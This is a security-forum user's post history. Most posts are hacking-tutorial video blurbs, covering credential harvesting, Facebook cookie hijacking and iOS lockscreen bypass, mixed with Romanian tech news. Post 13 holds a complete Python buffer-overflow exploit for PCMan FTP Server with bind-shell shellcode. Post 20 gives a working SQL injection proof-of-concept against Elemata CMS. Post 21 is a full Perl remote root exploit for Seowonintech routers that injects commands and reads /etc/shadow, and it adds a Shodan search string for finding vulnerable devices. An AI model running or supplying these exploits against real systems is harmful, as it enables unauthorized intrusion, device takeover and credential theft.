Jump to content

Kwelwild

Active Members
  • Posts

    638
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Kwelwild

  1. Hacking to Harvest User Login Credentials Off of the Network for Web Services Using Subterfuge Description: In this video you will learn how to use Subterfuge tool and compromise web services and steal credentials. Subterfuge is a MITM attack tool using Subterfuge you can easily perform an attack and tool is very easy to use and process is almost automatic. Original Source: Sursa: Hacking To Harvest User Login Credentials Off Of The Network For Web Services Using Subterfuge
  2. Description: This video is all about how to install configure Kali Linux on Android phone. Original Source: Sursa: Run Kali Linux On Android
  3. Description: In this video Eric Filiol talk about outlines potential threats to the TOR anonymity network from compromised cryptographic functions. http://cansecwest.com/csw11/filiol_csw2011.pdf Introduction: - Malware-based Information Leakage over IPSEC-like Tunnels Introduction Basics Concepts of IPSec Tunnels IP and IPSec Covert Channels Malware-based Information Leakage Experimental Results Dynamic cryptographic trapdoors Introduction OS Level Dynamic Trapdoors Algorithm Level Dynamic Trapdoors 4 Conclusion For More Information please visit : - CanSecWest Applied Security Conference: Vancouver, British Columbia, Canada Original Source: Sursa: Dynamic Cryptographic Backdoors To Take Over The Tor Network.
  4. http://www.youtube.com/watch?feature=player_embedded&v=Bfla9NQrJAc Description: This video is all about Scapy the powerful interactive packet manipulation program. So in this video Keith Barker talk about Scapy- what is scapy and why we should use scapy to develop our security scripts or any hacking tool. Original Source: Scapy (Backtrack and Kali Linux Tutorial Part 31) - YouTube Sursa: Fundamentals Of Scapy And Usage On Kali
  5. http://www.youtube.com/watch?feature=player_embedded&v=rEINqednJRU Description: In this video you will learn how to compromise a Facebook profile using the authentication cookies of the user. Basically In this video he will sniff the traffic and analysis the cookie and hijacking the facebook profile account. Original Source: Real!!! Backtrack 5 R3 Facebook Hacking Real!!! - YouTube Sursa: Capturing Facebook Authentication Cookies
  6. http://www.youtube.com/watch?feature=player_embedded&v=EkBgBBmDU4g Description: This video is all about Armitage and Metasploit exploitation. Armitage is scriptable red team collaboration tool created for the Metasploit Framework for task automation. Using Armitage hacking is easy and fun Original Source: Kali Linux Basic Usage of Armitage Scan View and Exploit - YouTube Sursa: Kali Linux - Usage Of Armitage Scan View And Exploit
  7. Unul dintre cele mai importante site-uri de pe Internet dispare. "Il inchidem pe 8 iulie" Vestea ca site-ul lor de suflet se inchide a induiosat milioane de utilizatori de Internet In perioada romantica a Internetului, cand Google nu exista iar paginile web erau la inceput, cunoscutul site AltaVista incerca sa faca ordine. Era un motor de cautare folosit de toti cei care doreau sa caute informatii. AltaVista este un stramos al Google-ului, iar fara acest site vechi, reteaua nu ar fi fost, astazi, la fel. AltaVista apartine acum de Yahoo. Cei de la relatii publice au dat un anunt sec: "Va rugam sa vizitati Yahoo! Search pentru toate nevoile voastre de cautare", anunta cnet. Acesta a fost mesajul scris, vineri, de Yahoo, care a anuntat ca inchide AltaVista pe 8 iulie. Alaturi de AltaVista, alte 11 produse care nu mai conteaza pentru companie vor fi desfiintate. Jay Rossiter, vicepresedintele Yahoo care are in grija platformele, a spus ca aceasta companie va continua sa "se concentreze pe crearea de produse frumoase care sunt esentiale pentru voi in fiecare zi". Cu alte cuvinte, Yahoo a decis sa isi concentreze resursele pe lucruri care functioneaza si de care utilizatorii au nevoie. Cu toate acestea, disparitia AltaVista le va lasa un gol in stomac utilizatorilor care au prins inceputurile Internetului. Sursa: Unul dintre cele mai importante site-uri de pe Internet dispare. Il inchidem pe 8 iulie - www.yoda.ro
  8. Facebook face o modificare istorica. Ce categorie de utilizatori saluta reteaua de socializare Echipa lui Mark Zuckerberg felicita autoritatile pentru o decizie curajoasa Twitter, Facebook, Instagram au fost invadate in ultimele zile de mesaje de sustinere sau de opozitie fata de invalidarea legii care defineste in SUA casatoria ca fiind o uniune intre un barbat si o femeie, relateaza Huffington Post. Facebook si-a aratat sprijinul fata de decizia Curtii Supreme a Statelor Unite lansand un nou emoticon in culorile curcubeului asa numitul "The Pride rainbow". Utilizatorilor din SUA care au ales mesajul "Feeling Pride" in bara de status de pe Facebook le-a aparut emoticonul viu colorat prin care si-au aratat sustinerea fata de grupurile comunitatii LGBT (comunitatea lesbiana, gay, bisexuala si transsexuala). Presedintele american Barack Obama a declarat joi, ca decizia Curtii Supreme a Statelor Unite in favoarea casatoriei intre persoane de acelasi sex este o "victorie pentru democratia americana". Sursa: Facebook face o modificare istorica. Ce categorie de utilizatori saluta reteaua de socializare - www.yoda.ro
  9. Description: In this video you will learn how to exploit a Linux system and Local Privilege Escalation exploit. Doing a port scan on the target reveals that several ports are open including an HTTP port. Upon browsing to the target website and looking at the HTML source, it seems that a commented line containing an account credential is available. A successful FTP login was made using the credentials and the file backup_log.php was downloaded. Using DirBuster, the logs directory was discovered. Trying backup_log.php as a possible page yields a positive result. There seems to be an event that happens every ten minutes as shown from the backup error logs. The attacker change his IP address to that of those in the logs and wait for the ten minute mark to again run a port scan. The attacker’s patience paid off, a new port-10001 is revealed and not knowing what service is running, a netcat connection was initiated to try and probe the service. After several tries, it would seem that netcat input are written on the page. A line of PHP code was then written that would allow for command execution on the target machine with the privileges of the webserver. A netcat listener was set up on the attacker’s machine that would catch the connection request from the target machine initiated by the attacker, this allows for a reverse shell to be available for the attacker. For More information please visit : - infosecdump: penetration testing tips, tricks, and references.: Linux - Web Application and Local Privilege Escalation Exploit Original Source: Sursa: http://www.securitytube.net/video/7872
  10. Description: In this video Scott Dunlop shows us how to reverse an Android Application. He is modifying an android application and insert additional functionality and compiling. This technique is common for reverse engineers to make applications more ractables. Original Source: Sursa: Re-Engineering Android Applications
  11. Cum sa iti adaugi ma locatia ON: Bine ai venit, sterge judetul si localitatea (spun asta pentru ca nu sti cand vreodata are vreun 'copoi' nevoie de ele).
  12. Description: This video is all about Metasploit Framework and Social-Engineering toolkit (SET). In the start of this talk you will learn about Metasploit Framework, Its interfaces, Basics usages and some of its utilities and a brief discussion about Social-Engineering toolkit (SET). For More Information, Please Visit : - Offensive Security Home Page (CIS 4930 / CIS 5930) Spring 2013 Original Source: Sursa: Offensive Security 2013 - Metasploit / Social-Engineer Toolkit
  13. PCMan's FTP Server 2.0.7 - Buffer Overflow Exploit #!/usr/bin/env python import signal from time import sleep from socket import * from sys import exit, exc_info # # Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command # Discovered and Reported******June 2013 # Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators # Exploit/Advisory*************http://infosec42.blogspot.com/ # Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21) # Tested Commands*************USER (Other commands were not tested and may be vulnerable) # CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending # def sigHandle(signum, frm): # Signal handler print "\n[!!!] Cleaning up the exploit... [!!!]\n" sleep(1) exit(0) def targServer(): while True: try: server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n\n>")) server = inet_ntoa(server) break except: print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n" sleep(1) continue return server def main(): print ("""\n [*] Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command [*] Discovered and Reported******June 2013 [*] Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators [*] Exploit/Advisory*************http://infosec42.blogspot.com/ [*] Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21) [*] Tested Commands*************USER (Other commands were not tested and may be vulnerable) [*] CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(21) Cmd = "USER " #Vulnerable command JuNk = "\x42" * 2004 # KERNEL32.dll 7CA58265 - JMP ESP ret = "\x65\x82\xA5\x7C" NOP = "\x90" * 50 #348 Bytes Bind Shell Port TCP/4444 #msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R | #msfencode -e x86/shikata_ga_nai -c 1 -b "\x0d\x0a\x00\xf1" R shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9" shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46" shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84" shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8" shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08" shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27" shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24" shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80" shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98" shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7" shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0" shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82" shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0" shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6" shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d" shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32" shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90" shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5" shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71" shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2" shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f" shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14" shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec" shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88" shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79" sploit = Cmd + JuNk + ret + NOP + shellcode sploit += "\x42" * (2992 - len(NOP + shellcode)) + "\r\n" try: print "\n [*] Creating network socket." net_sock = socket(AF_INET, SOCK_STREAM) except: print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0) try: print " [*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port) net_sock.connect((victim, port)) except: print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] Attempting to exploit the FTP USER command. [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [*] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution! [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" net_sock.close() except: print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0) if __name__ == "__main__": main() Sursa: PCMan's FTP Server 2.0.7 - Buffer Overflow Exploit
  14. Description: In this video you will learn how to exploit Wordpress 3.1.3 via SQL Injection Vulnerability. By Exploiting this Vulnerability an attacker will gain access to all records stored in the database and the privileges of the Wordpress database user. Original Source: Sursa: ?Wordpress 3.1.3 Sql Injection Vulnerabilities
  15. How To Bypass Ios 7 Passcode Lockscreen Access Photos App + Iphone 5/4s/4 Fast And Easy Glitch 7.0 http://www.youtube.com/watch?feature=player_embedded&v=UKbAMEOavgs Description: In this video you will learn how to Bypass Passcode Lockscreen on the iPhone iOS 7 - After Bypass Lockscreen you can access photos and some of the applications. Original Source: How To Bypass iOS 7 Passcode LockScreen Access Photos App + iPhone 5/4S/4 Fast & Easy Glitch 7.0 - YouTube Sursa: How To Bypass Ios 7 Passcode Lockscreen Access Photos App + Iphone 5/4s/4 Fast And Easy Glitch 7.0
  16. Description: This video demonstrates a script on Linux Enumeration - The script is very simple but it automates a lot of small tasks and generates output in the terminal as well saved into a nice report so we can analyze it. Original Source: Sursa: Linux Enumeration Script
  17. Description: Part 1 of 2 discussing some of the security risks that wifi presents and the tools you can use to check for yourself, starting with Hak5's wifi pineapple. Get more info at: WiFi Pineapple | Home Visit Troy Hunts beginners guide to the Pineapple: Troy Hunt: The beginners guide to breaking website security with nothing more than a Pineapple @J4vv4D Original Source: Sursa: Wifi Insecurity Part 1 - Pineapple
  18. Description: IPSec provides security to the Internet Protocol Layer. It does this by giving us the choices to use any encryption-decryption algorithm along with the mandatory security protocols.. IPSec uses some different important protocols such as AH (Authentication Header), ESP (Encapsulating Security Protocol), ISAKMP (Internet Security Association and Key Protocol) and IKE (Internet key exchange). Each has their own responsibility and functionality. To operate all this functionality, there are two basic modes such as: Transport Mode & Tunnel Mode. Here in this video I have demonstrated how Ipsec configuration can be done on XP machine 1 and 2. Then after configuration I am sending packet from one machine to another and determining result in wireshark packet analyzer. Original Source: Sursa: Deploying Ipsec Between Two Windows Machines
  19. OFF: Ai uitat sa specifici numarul de telefon (al tau, iubitei/iubitului), CNP-ul, bloc si scara ) ON: Bine ai venit, nu stiu cat vei rezista aici! Pentru o viata mai buna, va recomandam sa cititi regulamentul de minim 3 L pe zi!
  20. Elemata CMS RC3.0 (global.php, id param) - SQL Injection # Exploit Title : Elemata CMS RC3.0 SQL Injection # Date : 23 June 2013 # Exploit Author : CWH Underground # Site : www.2600.in.th # Vendor Homepage : http://www.elemata.com/ # Software Link : http://jaist.dl.sourceforge.net/project/elematacms/Elemata%203.x/ElemataRC3.0.zip # Version : RC 3.0 # Tested on : Window and Linux ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' ############################## VULNERABILITY: SQL Injection ############################## /functions/global.php (LINE: 24-30) ----------------------------------------------------------------------------- function e_meta($id) { include ("Connections/default.php"); mysql_select_db($database_default, $default); $query_meta = "SELECT * FROM posts WHERE id = '$id'"; $meta = mysql_query($query_meta, $default) or die(mysql_error()); $row_meta = mysql_fetch_assoc($meta); ----------------------------------------------------------------------------- ##################################################### DESCRIPTION FOR SQL INJECTION ##################################################### An attacker might execute arbitrary SQL commands on the database server with this vulnerability. User tainted data is used when creating the database query that will be executed on the database management system (DBMS). An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system depending on the query, DBMS and configuration. POC: http://http://localhost/elemata/?id=-1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%28user%28%29,0x3a3a,version%28%29,0x3a3a,database%28%29%29,NULL,NULL,NULL,NULL--+ Then View Source !! ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ Sursa: Elemata CMS RC3.0 (global.php, id param) - SQL Injection
  21. Seowonintech Devices - Remote root Exploit #!/usr/bin/perl # # [+] Seowonintech all device remote root exploit v2 # ===================================================== # author: | email: # Todor Donev (latin) | todor dot donev # Òîäîð Äîíåâ (cyrillic) | @googlemail.com # ===================================================== # type: | platform: | description: # remote | linux | attacker can get root # hardware | seowonintech | access on the device # ===================================================== # greetings to: # Stiliyan Angelov,Tsvetelina Emirska,all elite # colleagues and all my friends that support me. # ===================================================== # warning: # Results about 37665 possible vulnerabilities # from this exploit. # ===================================================== # shodanhq dork: # thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013 # ===================================================== # P.S. Sorry for buggy perl.. # 2o13 Hell yeah from Bulgaria, Sofia # # Stop Monsanto Stop Monsanto Stop Monsanto # # FREE GOTTFRID SVARTHOLM WARG FREE # GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder # who was sentenced to two years in jail by Nacka # district court, Sweden on 18.06.2013 for hacking into # computers at a company that manages data for Swedish # authorities and making illegal online money transfers. use LWP::Simple qw/$ua get/; my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; if(not defined $ARGV[0]) { usg(); exit; } print "[+] Seowonintech all device remote root exploit\n"; $diagcheck = $host."/cgi-bin/diagnostic.cgi"; $syscheck = $host."/cgi-bin/system_config.cgi"; $res = $ua->get($diagcheck) || die "[-] Error: $!\n"; print "[+] Checking before attack..\n"; if($res->status_line != 200){ print "[+] diagnostic.cgi Status: ".$res->status_line."\n"; }else{ print "[o] Victim is ready for attack.\n"; print "[o] Status: ".$res->status_line."\n"; if(defined $res =~ m{selected>4</option>}sx){ print "[+] Connected to $ARGV[0]\n"; print "[+] The fight for the future Begins\n"; print "[+] Exploiting via remote command execution..\n"; print "[+] Permission granted, old friend.\n"; &rce; }else{ print "[!] Warning: possible vulnerability.\n"; exit; } } $res1 = $ua->get($syscheck) || die "[-] Error: $!\n"; if($res1->status_line != 200){ print "[+] system_config.cgi Status: ".$res1->status_line."\n"; exit; }else{ print "[+] Trying to attack via remote file disclosure release.\n"; if(defined $syscheck =~ s/value=\'\/etc\/\'//gs){ print "[+] Victim is ready for attack.\n"; print "[+] Connected to $ARGV[0]\n"; print "[o] Follow the white cat.\n"; print "[+] Exploiting via remote file dislocure..\n"; print "[+] You feeling lucky, Neo?\n"; &rfd; }else{ print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n"; exit; } } sub rfd{ while(1){ print "# cat "; chomp($file=<STDIN>); if($file eq ""){ print "Enter full path to file!\n"; } $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY"; $data=get($bug) || die "[-] Error: $ARGV[0] $!\n"; $data =~ s/Null/File not found!/gs; if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){ print $1."\n"; } } } sub rce{ while(1){ print "# "; chomp($rce=<STDIN>); $bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping"; $rce =~ s/\|/\;/; if($rce eq ""){print "enter Linux command\n";} if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';} if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...\n"; exit;} $data=get($bug) || die "[-] Error: $!\n"; if (defined $data =~ m{(\s.*) Content-type:}sx){ $result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms'); $result =~ s/ loss\n//; $result =~ s/ ms\n//; print $result; } } } sub usg { print " [+] Seowonintech all device remote root exploit\n"; print " [!] by Todor Donev todor dot donev @ googlemail.com\n"; print " [?] usg: perl $0 <victim>\n"; print " [?] exmp xpl USG: perl $0 192.168.1.1 \n"; print " [1] exmp xpl RCE: # uname -a \n"; print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd \n"; } Sursa: Seowonintech Devices - Remote root Exploit
  22. Proiectul secret la care lucreaza Facebook a ajuns la urechile presei. Ce li se pregateste utilizatorilor Facebook pare sa vina cu din ce in ce mai multe artificii pentru a-i incuraja pe utilizatori sa petreaca timp in retea. Reteaua de socializare Facebook si-a propus sa devina un fel de ziar personalizat pentru utilizatorii de telefoane si tablete, scrie Wall Street Journal, publicatie care citeaza surse "care cunosc problema". Facebook ar lucra in secret la un serviciu botezat pe plan intern Reader, care afiseaza continut de la utilizatori ai retelei si de la publicatii intr-un nou format vizual, pentru dispozitive mobile. Deja cei de la Facebook ar munci de un an la acest proiect, care era in lucru in momentul in care Google a anuntat ca renunta la aplicatia Google Reader. In aceasta zona, Facebook va concura direct cu Flipboard, care are 50 de milioane de persoane inscrise, dar si cu Pulse. Dupa ce Google a anuntat ca isi inchide Readerul, multa lume a sarit sa ofere un produs din aceeasi zona. Digg, AOL si Feedly sunt doar cateva dintre numele care vor o parte din piata. Sursa: Proiectul secret la care lucreaza Facebook a ajuns la urechile presei. Ce li se pregateste utilizatorilor - www.yoda.ro
  23. Description: In this video you will learn how to exploit a web application and get meterpreter shell using SQLMAP. In this video Hoody going to exploit MS-SQL database server through privileged user access via SQL Injection. Original Source: Sursa: Ms-Sql Injection 2 Meterpreter Shell (Sqlmap --Os-Pwn)
  24. Description: In this video you will learn how to find the SQL injection and find the admin logging page + how to upload a shell and exploit the system. In this video Hoddy using a ASPX web shell and a payload created with kalistra project - Hood3drob1n Original Source: Sursa: Asp Webapp Takeover
  25. http://www.youtube.com/watch?feature=player_embedded&v=qFfR_BQE9ac Description: Tries to identify the physical location of an IP address using the Geobytes geolocation web service (IP Address Locator - Enter an IP address to find its location - Lookup Country Region City etc). The limit of lookups using this service is 20 requests per hour. Once the limit is reached, an nmap.registry["ip-geolocation-geobytes"].blocked boolean is set so no further requests are made during a scan. How to use : nmap --script ip-geolocation-geobytes Output : | ip-geolocation-geobytes: | latitude: 43.667 | longitude: -79.417 | city: Toronto | region: Ontario |_ country: Canada Original Source: https://www.youtube.com/watch?v=qFfR_BQE9ac Sursa: Finding Out Geolocation Of Ip Address Using Nmap
×
×
  • Create New...